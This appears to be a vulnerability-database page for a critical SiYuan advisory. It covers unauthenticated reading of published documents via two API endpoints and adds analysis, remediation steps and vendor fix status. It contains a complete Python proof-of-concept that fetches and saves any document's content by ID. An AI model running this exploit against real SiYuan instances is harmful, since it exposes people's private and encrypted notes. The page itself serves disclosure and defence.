Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
6DescriptionGitHub Advisory
Details
Document IDs were retrieved via the /api/file/readDir interface, and then the /api/block/getChildBlocks interface was used to view the content of all documents.
PoC
#!/usr/bin/env python3
"""SiYuan /api/block/getChildBlocks 文档内容读取"""
import requests
import json
import sys
def get_child_blocks(target_url, doc_id):
"""
调用 SiYuan 的 /api/block/getChildBlocks API 获取文档内容
"""
url = f"{target_url.rstrip('/')}/api/block/getChildBlocks"
headers = {
"Content-Type": "application/json"
}
data = {
"id": doc_id
}
try:
response = requests.post(url, json=data, headers=headers, timeout=10)
response.raise_for_status()
result = response.json()
if result.get("code") != 0:
print(f"[-] 请求失败: {result.get('msg', '未知错误')}")
return None
return result.get("data")
except requests.exceptions.RequestException as e:
print(f"[-] 网络请求失败: {e}")
return None
except json.JSONDecodeError as e:
print(f"[-] JSON解析失败: {e}")
return None
def format_block_content(block):
"""格式化块内容"""
content = ""
# 获取块内容
if isinstance(block, dict):
# 尝试多种可能的字段
md = block.get("markdown", "") or block.get("content", "") or ""
if md:
content = md.strip()
return content
def main():
"""主函数"""
if len(sys.argv) > 1:
target_url = sys.argv[1]
else:
target_url = input("请输入 SiYuan 服务地址 (例如: http://localhost:6806): ").strip()
if not target_url:
target_url = "http://localhost:6806"
print(f"目标地址: {target_url}")
print("=" * 50)
while True:
print("\n" + "=" * 50)
doc_id = input("请输入文档ID (输入 'quit' 或 'exit' 退出): ").strip()
if doc_id.lower() in ['quit', 'exit', 'q']:
print("程序退出")
break
if not doc_id:
print("[-] 文档ID不能为空")
continue
print(f"\n[*] 正在读取文档: {doc_id}")
blocks = get_child_blocks(target_url, doc_id)
if blocks is None:
print("[-] 获取文档内容失败")
continue
if not blocks:
print(f"[!] 文档 {doc_id} 没有子块或为空")
continue
print(f"[+] 成功获取 {len(blocks)} 个子块")
print("-" * 50)
# 保存所有块内容
all_blocks_content = []
for i, block in enumerate(blocks, 1):
content = format_block_content(block)
if content:
print(content[:200] + ("..." if len(content) > 200 else ""))
all_blocks_content.append({
"index": i,
"content": content,
"raw_block": block
})
# 询问是否保存到文件
save_choice = input("\n是否保存到文件? (y/N): ").strip().lower()
if save_choice in ['y', 'yes']:
filename = f"doc_{doc_id}_blocks.json"
try:
with open(filename, "w", encoding="utf-8") as f:
json.dump({
"doc_id": doc_id,
"block_count": len(blocks),
"blocks": all_blocks_content
}, f, ensure_ascii=False, indent=2)
print(f"[+] 已保存到: {filename}")
except Exception as e:
print(f"[-] 保存失败: {e}")
print("-" * 50)
if __name__ == "__main__":
main()<img width="1492" height="757" alt="image" src="https://github.com/user-attachments/assets/2e08a286-dceb-4fd5-87d5-44f39983dcbc" />
Impact
File reading: All encrypted or prohibited documents under the publishing service could be read.
AnalysisAI
An unauthenticated information disclosure vulnerability exists in SiYuan note-taking application that allows remote attackers to read the content of all documents, including encrypted or access-restricted files, through two API endpoints (/api/file/readDir and /api/block/getChildBlocks). A working proof-of-concept Python exploit has been published demonstrating complete document enumeration and content retrieval. With a CVSS score of 9.8 (Critical) indicating network-based exploitation requiring no privileges or user interaction, this represents a severe confidentiality breach for all published SiYuan instances.
Technical ContextAI
SiYuan is a Go-based (github.com/siyuan-note/siyuan/kernel) personal knowledge management and note-taking application. This vulnerability stems from CWE-125 (Out-of-bounds Read), though the behavior appears to be an access control failure rather than a traditional buffer overflow. The application exposes RESTful API endpoints that fail to properly enforce authentication or authorization checks. The /api/file/readDir endpoint leaks document identifiers without authentication, and the /api/block/getChildBlocks endpoint returns full document content when provided with these IDs. Both endpoints accept JSON payloads and return structured data, enabling complete enumeration and exfiltration of the document repository through sequential API calls. The vulnerability specifically affects the published/shared document service, suggesting a misconfiguration in how public-facing instances handle access control compared to local installations.
RemediationAI
Immediately consult the official SiYuan security advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-34xj-66v3-6j83 for the patched version and upgrade instructions. Users should update to the latest version of SiYuan that addresses this vulnerability as soon as it becomes available. Until patching is completed, implement immediate compensating controls including disabling the publishing service entirely if not critically required, restricting network access to SiYuan instances using firewall rules or VPN requirements to trusted IP ranges only, and implementing reverse proxy authentication (such as OAuth2 or basic authentication with strong credentials) in front of all API endpoints. Organizations should assume that any documents in published services may have been accessed and conduct data breach assessments accordingly. After patching, review access logs for suspicious API calls to /api/file/readDir and /api/block/getChildBlocks endpoints to identify potential exploitation attempts.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-125 – Out-of-bounds Read
View allSame technique Information Disclosure
View allVendor StatusVendor
SUSE
Severity: Critical| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-16432